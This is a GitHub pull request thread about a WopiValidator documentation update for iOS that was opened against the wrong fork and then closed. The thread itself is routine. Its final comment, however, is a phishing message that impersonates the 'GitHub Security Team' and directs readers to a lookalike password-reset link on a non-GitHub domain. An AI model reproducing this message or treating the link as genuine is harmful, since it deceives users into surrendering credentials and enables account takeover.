### PR TITLE
Update WopiValidator documenation for iOS

### PR DESCRIPTION
**Pull request by mandaryadav**
Update WopiValidator documenation for iOS

### CODE REVIEW

**Comment by mandaryadav** [comment]
@tylerbutler Hey Tyler: Can you take a look at this documentation when you get a chance ? Thanks !

**Comment by tylerbutler** [comment]
@mandaryadav I'm confused; did you mean to make this PR against the main project?

**Comment by mandaryadav** [comment]
Yes, I want to commit the "Updating WopiValidator documentation for iOS integration" changes to master from patch 1, Did I do something wrong ? Let me know

**Comment by tylerbutler** [comment]
Yeah I think you made this PR on your own forked repository, not the official one. I've already approved the ones you submitted against the main reprository. You may need to `git pull` the latest changes into your fork.

**Comment by mandaryadav** [comment]
oops, Sorry about that. I have closed this pull request and created a separate one against the master at https://github.com/Microsoft/Office-Online-Test-Tools-and-Documentation/pull/215/files

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**

**Pull request closed without merging**
